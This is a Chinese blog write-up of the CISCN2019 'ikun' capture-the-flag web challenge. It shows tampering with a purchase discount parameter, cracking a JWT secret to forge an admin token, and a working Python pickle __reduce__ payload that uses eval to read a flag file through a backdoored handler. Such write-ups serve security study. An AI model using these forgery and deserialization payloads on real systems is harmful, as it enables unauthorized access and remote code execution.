[CISCN2019 华北赛区 Day1 Web2]ikun (JWT更改与python反序列化)

最新推荐文章于 2023-12-01 21:51:42 发布
最新推荐文章于 2023-12-01 21:51:42 发布
阅读量622 收藏 1
点赞数
分类专栏: Web刷题记录 文章标签: web php python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/111565278
版权

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

题目

在这里插入图片描述
提示是要买到Iv6,有很多页面,需要写脚本来找

import requests
url="http://5d13c449-296b-4491-9240-52ac885c1bc3.node3.buuoj.cn/shop?page="

for i in range(0,400):

	r=requests.get(url+str(i))
	if 'lv6.png' in r.text:
		print (i)
		break

头部可以根据自己的来填或者不填,运行出来知道lv6在181页面
随便注册一个用户登录进去,点开这个用户
在这里插入图片描述
提示flag就是它没错了,尝试购买它,发现不能购买,不够钱,用户默认只有1000
在这里插入图片描述

但是看到这个优惠券,我选择抓包看一下
在这里插入图片描述
更改discount即为修改折扣,修的低一点就能买了
在这里插入图片描述
买完之后跳转到了b1g_m4mber界面,提示只能够admin访问,再次抓一下包
在这里插入图片描述
这里就要涉及到JWT的知识了,具体了解可以看下这篇文章https://www.cnblogs.com/cjsblog/p/9277677.html
总的来说,JWT分三部分,第一第二部分可以用base64解码看到
在这里插入图片描述

HS256是第三部分(即签名部分)的加密方式,这里username的aaa就是我创建的用户名,但可不能想着单独把username直接改成admin就能完事,后面的签名部分是依靠前面的数据加密而来的,同时也会验证前面的数据是否正确,所以更改admin的同时还需要更改签名部分的密文。
为了得到签名部分,你必须有编码过的header、编码过的payload、一个秘钥,签名算法是header中指定的那个,然对它们签名即可。 这句话中提及,还需要有一个秘钥,那么秘钥需要怎么来呢?
对JWT进行爆破攻击,得到我们秘钥,使用的工具:c-jwt-cracker

  • 使用c-jwt-cracker需要我们在我们linux里安装好openssl头文件。
  • 在linux的配置命令是:apt-get install libssl-dev
  • 下载好c-jwt-cracker,还需要在工具所在目录执行make命令,目的是让文件makefile运行起来。
  • 编译完后会生成一个jwtcrack文件。

在这里插入图片描述
得到秘钥为1Kun,然后我们需要去到JWT官网重新编辑数据得到恶意JWT

在这里插入图片描述

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
在这里插入图片描述

更改提交后得到以下界面

在这里插入图片描述
提示了源码好像,下载下来看看,不会做了…
看了看大佬的wp,大概就懂了一点。
源代码里面有一个hint,unicode编码。解码后提示我们有后门,在admin.py这个文件里面

from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

主要看传入的become,这里就是利用点,这里需要了解python的魔法方法与pickle
pickle就是python的序列化模块,有关于pickle与python的魔法方法可以去看看这篇文章
urllib.unquote则是解码httpheaders的函数,它与urllib.urlencode函数的区别就在于把%2F,%40这种特殊字符显示出来
再看看这些魔法方法
在这里插入图片描述
我们需要用到__reduce__,当__reduce__被定义之后,该对象被Pickle时就会被调用我们这里的eval用于重建对象的时候调用,再该方法被调用时,在方法内告诉python使用eval读取flag文件,就能达到恶意执行命令的效果,EXP:

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

运行脚本就能够得到这一串

c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.

将它传给become
在这里插入图片描述
得到flag
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
探索C语言JWT破解工具:`c-jwt-cracker`
gitblog_00009的博客
03-23 537
探索C语言JWT破解工具:c-jwt-cracker 项目地址:https://gitcode.com/brendan-rius/c-jwt-cracker 如果你在寻找一个轻量级、高效且开源的JSON Web Token(JWT)破解工具,那么c-jwt-cracker可能正是你需要的。这是一个用纯C语言编写的项目,其设计目标是解密那些使用可预测密钥或算法生成的JWT。 项目简介 c-jwt...
基于Tkinter的ikun播放器(软件、开源代码及资源包)
10-12
基于Tkinter的ikun播放器(软件、开源代码及资源包) 文章: https://blog.csdn.net/weixin_53403301/article/details/127281839
一天一道ctf 第41天(JWT python序列化pickle)
scrawman的博客
07-22 500
[BSidesCF 2019]Futurella 一开始看题目觉得还挺有意思的,结果查看源代码就能得到flag???这真是我做过最简单的题目了。 [CISCN2019 华北赛区 Day1 Web2]ikun 作者也是老阴阳人了,紧跟时事, 目标是要买到lv6,但是连续看几页都没有lv6,那就写一个脚本搜索一下,在第181页找到lv6,但是买不起啊。 import requests url="http://dea21ab8-0a31-4781-8f0b-7d5285a017c0.node4.buuoj.
ubuntu/kali安装c-jwt-cracker及使用方法
最新发布
m0_61025358的博客
12-01 2584
ubuntu/kali安装c-jwt-cracker及使用方法 c-jwt-cracker介绍: c-jwt-cracker是用 C 语言编写的多线程 JWT 暴力破解程序(所以在运行它的时候你的CPU可能会出现100%使用的情况)。
[CISCN2019 华北赛区 Day1 Web2]ikun
qq_62046696的博客
10-15 634
这里的.content就是读取源文件字节流,随后将该字节流编码为Unicode编码,方便再进行更加精确的解码。看见了jwt,通过上面链接了解jwt由三个部分组成,前两个部分分别是base64编码,解码可以获得。明显不够我们就1000也没有充值界面,所以最有可能的就是这个优惠看是否可以修改。以为要成功可是,限制admin,所以我们就要看一下是通过什么判断我的用户名的。下载到本地后需要使用,make命令,就会生成jwtcrack。找到了密码,然后就可以更改为admin。然后是181页,可是。
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
是爱坤你就来
ikun.exe
10-19
ikun.exe
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
.net版本单点登录与权限管理(web api)
03-22
.net版本单点登录与权限管理(web api)
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1230
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
IKUN必学Python
bbbb8989的博客
11-08 1496
Python,坤坤
Python|ikun专属tkinterGUI设计,你不看看?
m0_73860186的博客
11-30 3992
(。・∀・)ノ゙嗨,大家好。我已经是鸽鸽十坤年老粉了,我打算给我家鸽鸽做一个ikun模拟器,你们这些小黑子难道只想吃我家鸽鸽下的蛋,不为鸽鸽做些什么吗,要是想当一名合格ikun粉,就跟我一起为鸽鸽做个简单的ikun模拟器吧!
网安学习-CTF夺旗
weixin_44770698的博客
08-26 2175
网安学习-CTF(Python反序列化+JWT
JSON Web Token令牌(JWT)简单使用(重写自带的用户认证和token流程)
咸鱼!!!
06-26 3153
重写自带的用户认证和token流程token应用流程:Django提供内置的用户认证功能。为何要自己写认证如何使用的jwt自带的验证视图在前端登录ajax请求重写jwt的返回内容JWT如何返回用户信息或者修改信息serializers.py写一个序列化器view.py设置指定模型(重要)js根据JWT的值发送get请求获取信息js里根据JWT的值发送PUT请求 官方文档:https://yiyib...
jackson序列化和反序列化(单个对象、列表)
z69183787的专栏
05-29 3615
[html] view plaincopy 1.maven配置   dependency>   groupId>org.codehaus.jacksongroupId>   artifactId>jackson-mapper-lgplartifactId>   version>1.7.4version>   dependency>   2.新建一个
ikun python
10-08
ikun python是指使用Python编写的一些项目或功能,其中包括ikun飞机大战和ikun音乐播放器。ikun飞机大战是一个使用Python和tkinter库开发的游戏,而ikun音乐播放器则是使用Python的tkinter和pygame库开发的一个音乐...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值